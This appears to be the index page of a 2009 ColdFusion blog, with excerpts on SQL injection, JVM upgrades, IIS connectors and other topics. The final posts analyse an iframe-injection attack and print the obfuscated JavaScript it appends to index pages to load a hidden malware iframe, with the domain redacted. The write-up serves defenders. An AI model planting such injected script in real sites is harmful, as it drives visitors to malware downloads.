Coldfusion Muse

My Funny Val()entine and SQLi

Mark A. Kruger — Mon, 15 Jun 2009 12:30:00 -0500

Regular readers know I'm always on the lookout for interesting issues regarding SQL Injection and ColdFusion. This year has been a banner year for injection on ColdFusion sites and if you are not on the Cfqueryparam bandwagon yet I have one more example of a code that might seem to be inoculated but is not. It has to do with the use of val( )....

[More]

Ask-a-Muse: How Do I Upgrade the JVM?

Mark A. Kruger — Thu, 11 Jun 2009 12:41:00 -0500

Muse Reader Rob Asks:
I have a silly question. How exactly do you upgrade the JVM on your ColdFusion server? My server is on Win2k3 x64 and the JVM version is 1.6.0_04. Do you specify it manually in the jvm.config file?

I'm glad you asked this question because it reminds me that I sometimes give advice without any follow through - which is the same problem I have with my 8 iron. Upgrading the JVM on a windows installation is pretty easy. Just remember that you will need the correct Java Runtime for your platform and ColdFusion version. Rob specified Win2k3 x64 so I assume he means he is running ColdFusion 8 enterprise 64 bit - in which case the target version is 1.6 update 14 (or 1.6.0_14). I usually start at the Sun Java download page. Once you have the right version in hand the rest is easy.

[More]

Certain JPGs Can Crash Your ColdFusion 8 Server

Mark A. Kruger — Wed, 10 Jun 2009 09:41:00 -0500

This issue was brought to my attention by Adrian Lynch on CF-Talk. It seems that if you use the new image functions in ColdFusion 8 against certain kinds of JPG images you can actually cause your JVM to crash. If you have code that uses the latest image functions to handle uploaded images you should definitely take note of this post. I cannot yet see how a user might take advantage of this bug to penetrate your server, but a malicious (or even non-malicious) user could easily perform a denial of service attack and cause your CF server to go up and down like Jack LaLanne doing jumping jacks. So if you fit into that category (handling uploaded images using CF 8 image functionality) here's the scoop.

[More]

Connector Problems - Win2k8, IIS7 and Multi-Server ColdFusion 8 x 64 Bit

Mark A. Kruger — Tue, 09 Jun 2009 16:09:00 -0500

I have not yet had this problem specifically, but it was pointed out by CFG Tom Forrest who spent some time wrangling with it. He was trying to use the connector widget to connect IIS 7 sites to ColdFusion instances (running in Multi-Server Mode). He reports as follows:

The connector refused to install anything into IIS. When I started it, the first window would appear. When I clicked "add" I would see something to the effect of, Installing required IIS7 components. It may take 2 to 5 minutes to complete. The window that allows you to set all the parameters would open, and you could select any of your running CF servers. However, you couldn't select any of the IIS sites that were created. Assuming you give up and click ok, allowing it to "install to all" you would get an error window stating error creating IIS application extensions ColdFusion.

According to Tom the fix is to install the IIS 6 Management Compatibility role service. This service allows an IIS 7 server to "act like" an IIS 6 server. Once installed the configuration tool began to work.

While I haven't had this specific problem, I have noticed that a number of other things are easier and more familiar with the IIS Management Compatibility installed. Thanks Tom.

Ask-a-Muse: Killing the Immortal Thread

Mark A. Kruger — Tue, 09 Jun 2009 09:18:00 -0500

Muse Reader Joe Asks:
How do I kill a request? Every other day or so there will be a runaway process that cannot be killed. Clicking on the red exclamation in the monitoring tool does not give an error but it does not kill the request either. My question is how to kill this process?

Ah the immortal thread - like a god coming down from Mt. Olympus and laughing with his (or her) hands on his mighty hips (see why I chose "his"? ... "her mighty hips" ... well, I just didn't want to go there). Such threads are mind bogglingly frustrating. In actual fact, there are some requests spawned by ColdFusion that may not be able to be terminated by ColdFusion. For the long version read on McDuff.

[More]

Google Wave - The Next Thing?

Mark A. Kruger — Wed, 03 Jun 2009 11:49:00 -0500

Like most geeks I love technology. I'm always reading about the cutting edge of research. I can become as engrossed in an online white paper about nano-technology as I am in my favorite TV Show - which is a toss up between the gritty AMC Drama Breaking Bad and the light hearted and endearing (although occasionaly gruesome) Pushing Daisies with the irrepresible Kristin Chenoweth as former Jockey-turned-waitress Olive Snook. Who else could make unrequited love seem so appealing and delicious... but I digress. This "forward leaning" interest in technology tends to create a momentum for me and even for my company (CF Webtools) that makes me prone to try new things. So when Google announces a ground breaking new paradigm for collaboration my temptation is to say "count me in". In case you missed the hype I'm talking about Google Wave which was previewed at Google I/O.

Google Wave aims to combine elements of email, chat, blogging, micro-blogging, collaboration, source control, and social networking into a single interface that claims to draw in all the best features of these tools while eliminating some of the annoying drawbacks. The paradigm for Google Wave moves away from "messages" and toward a "conversation". That might seem too abstract to matter, but such idioms are important because they give us an anchor - a point of reference for understanding something new.

Let me say at the outset that I'm positively inclined toward this product (at least, what I've seen of it). I can see how it would benefit my own team in many ways. I'm already thinking of how I might enhance our vast, custom tracking system using the Wave Protocol. One of the best things about Wave isthe protocol layer and integration strategy. So I am not against the product - indeed I'm rooting for it. I would love to get rid of our hodgepodge of tools in favor of one elegant way of collaborating. Still, I see some problems for Wave on the horizon. So if you want the contrarian view read on...

[More]

Fun With Qw...Uh...Acme Communications

Mark A. Kruger — Fri, 15 May 2009 11:20:00 -0500

Muse readers and friends who know me well understand that I'd rather have my nether regions bitten by a Laplander than deal with sales people over the phone. However, as a (usually) caring person, I try not to let my personal ire show too forcefully when one of these hard working sales folks call. I know they are just doing their job. Recently however, one phone company has caused me to rethink my "no throttling the sales person" position. I won't say their name but it begins with a Q and ends with est - and in a twist it does not have a U in it. I guess these folks don't know how to spell NO either because they keep calling.

Usually it is pretty typical stuff like "are you happy with your phone service". I'm actually not happy with my phone service but I prefer not to discuss it with strangers over the phone. Still I'm usually pretty nice and say something like "we are not ready to make a change right now." The last 2 times however, the salesman has chosen a new tack. They are now trying to wheedle additional proprietary information out of me. Today things did not go so well....

[More]

Cfinclude for Good or Evil

Mark A. Kruger — Thu, 14 May 2009 09:23:00 -0500

Yesterday I was doing some searches on a sick server to troubleshoot the Iframe Injection issue. A user had posted some additional information regarding a file that appeared on his server that had this issue. The file was named "fection.cfm" so we now know the hacker casually removes his prefixes (or I should say 'emoves his 'efixes). I began my search by looking for the file specifically, then moved on to look for the string "cfexecute" in all of the *.cfm files. But that got me thinking. A clever hacker might know some things about ColdFusion. He could in fact, further obscure his code with some knowledge of cfinclude and IIS. Such a technique can be used to secure your code as well. You can create code that is only runnable by ColdFusion using cfinclude. Here's the skinny.

[More]

Help an Aspiring Animator

Mark A. Kruger — Wed, 29 Apr 2009 10:04:00 -0500

My nephew is 16 or 17 and wants to become an animation/game programmer. He's been working using a product called blender. It seems to be pretty polished for an open source project. I was impressed with the movie galleries on the site and especially with the "Big Buck the Bunny" and "Elephants Dream" - pretty awesome cgi stuff. Most of you who read my blog know that I am not qualified to do (or judge) anything artistic. My wife won't even let me choose which soap to put in the shower. So I thought I would be a good uncle and ask my readers if they have a take on Blender. Is it "up to snuff" for an IDE? Is there something more powerful or better he should be using (and why)?

He gave me an animation which I have converted to FLV. You can check it out at this link. Take a look and see what you think. I think he has talent. It needs audio, but it's pretty smooth and he's thought of a number of things - backlighting, reflections and shadows etc. What I don't know is if it's "out of the box" thinking or the result of working his way through tutorials. I would appreciate any comments you can muster, but please be helpful and not too critical (remember when you were just starting out :). If you have a comment you want to send without posting it "live" feel free to use the ask-a-muse box in the upper right or email me directly at mkruger at cfwebtools.com.

Passing an Array to a .NET Webservice

Mark A. Kruger — Mon, 27 Apr 2009 21:09:00 -0500

Here's a problem that will leave you scratching your head should you ever run into it. Consider a simple .NET web service that requires an "array of strings". The goal was to make use of a web service API published by Smarter Mail. I wanted a programmatic way of adding email aliases - groups of emails that function under a single address. The web service methods provided by the smarter mail API could not be simpler. Each request requires a username, password, domain and then additional stuff to make it work. For example, the "GetAlias()" function allowed me to pass in a domain and alias and get a list of emails already associated with that alias.

The problem came when it was time to add or update an alias. The argument for "addresses" to pass to the .NET service looked like "an array of strings" (that's how the help docs referred to is as well). The node in the XML looked pretty simple:



      string
      string
      string
      string
      
        string
        string

Now I can think of several ways to create an array of strings in ColdFusion so I started giving it the old college try. Unfortunately each attempt ended in failure. I could not figure out how to get a data type instantiated in CF to match the data type that .NET expected. I ended up experimenting with several different approaches to the array syntax.

[More]

The Inquisitive Mind

Mark A. Kruger — Mon, 27 Apr 2009 11:32:00 -0500

A misconception about technical folks is that they are fully left-brained and incapable of true creativity. Anyone on the inner circle of geekdome knows this is not the case, but folks on the outside looking in often only see the engineering skills - attention to detail and minutia, obsession with systems and process, and a penchant for pocket protectors. Of course in the last 10 years you can add flip flops, body piercings and a sort of pigeon English consisting of acronyms, techno-babble and quips from Monty Python and the Princess Bride. That should tell you something in itself. There's more to IT folks than numbers and obscure discussions about the best Star Trek Movie (Khaaaan!!!!). That got me thinking.

[More]

VB Script For Iframe Injection Attack

Mark A. Kruger — Thu, 23 Apr 2009 11:14:00 -0500

Thanks to Nate from CF-Talk I have a copy of the malicious VBS script that is doing the damage. If you are being victimized by this attack and you need to see the script for whatever purpose, let me know and I will make sure you get a copy. I now it goes without saying, but just don't run it :).

Meanwhile there is some consensus, given the root access of this code, that an infected server cannot be trusted even after a thorough cleaning. Dave Watts and Tom Chiverton both gave such advice. While it's not always possible and it's a huge hassle, it might be the best solution to bite the bullet and do it.

Iframe Injection Follow Up

Mark A. Kruger — Tue, 21 Apr 2009 09:29:00 -0500

For those of you who have been following the Iframe injection attack saga (see Iframe Insertion on Index.* Home pages) I have an update. I would like to thank one of my readers named Kumar for referring me to this excellent article (a PDF File) on Black Hat. The article seems to pinpoint the origin and nature of the attack. The document describes an attack in depth with multiple steps (just as we had speculated). The first step was an SQLi attempt. But failing that the attacker compromised the server in a rather ingenious fashion.

Using an image upload capability he uploaded a file to the server that "looked" like an image but was not.
The file (containing executable code) was then hit with GET and POST requests.
The payload of the get and post requests was able to set up scheduled tasks to append the JS code to "index.*" files on a timed basis.

This file that was uploaded was a CDX file. On a properly configured IIS server this attack would fail to succeed. Here's why.

[More]

Review: Foundeo Web Application Firewall

Mark A. Kruger — Fri, 17 Apr 2009 17:44:00 -0500

Coldfusion Guru and all around super geek Pete Freitag was nice enough to let me check out his new "Web Application Firewall" (see this link for more info). This product serves as a Coldfusion based security filter for all requests coming to an application. I was impressed with the approach Pete takes. After the Init the code ran smoothly and did not appreciably increase my page load time (always a concern when you are "wrapping" your application in something). If you use Pete's system you will pretty much guarantee that your site will be protected from a high percentage of known attacks. Overall I give the application an A for innovation and organization, a B+ for installation and a C- on the price. If you want to know more read on.

[More]

Iframe Insertion on Index.* Home pages

Mark A. Kruger — Thu, 16 Apr 2009 14:18:00 -0500

There's a hack that's beginning to be active that targets pages named "index.*". Actually it sounds rather like an old hack that is resurfacing. Since many ColdFusion sites use this convention for the home page this attack tends to hit quite a few ColdFusion sites that are vulnerable. The attack appends a script like this one to the bottom of each "index.*" page: var applstrna0 = " ; var applstrna1 = "rame src=http://***Domain Host Name****"; var applstrna2 = ".com/bb/faq.htm"; var applstrna3 = " width=100 height=0> ; var applstrna4 = "frame>"; document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); Please note that I have not included the actual url of this attack. The domain includes the string "said7". I am only making sure I mention said7 so that folks searching for info on this attack can find this specific post and possibly be helped. I have no wish to benefit the said7 effort and I hope they all get dysentery and spend the weekend in the latrine.

As you can see the script itself is pretty simple. It writes out an invisible Iframe to the bottom of the page. The target of the Iframe attempts to download a trojan or malware to the users machine. This attack is insidious and I have yet to discover the origin. But I do know a few things about it - and how to prevent it from continuing. One important thing to note, if you have this problem and Google indexes your sites and sees these pages they will flag your site. Browsers like Firefox use the Google service to throw up a big "malware" warning.

The following article details the attack and the notes I've gathered about it. Some day soon I hope to post a more definitive who, what, when and why post about it. To gather the following notes I'm indebted to the folks on the CF-Talk List (this thread), Nathan, Nick, Jason, Scott, Don and probably a few others I am forgetting. I can't give away too much info here - but please accept my thanks.

[More]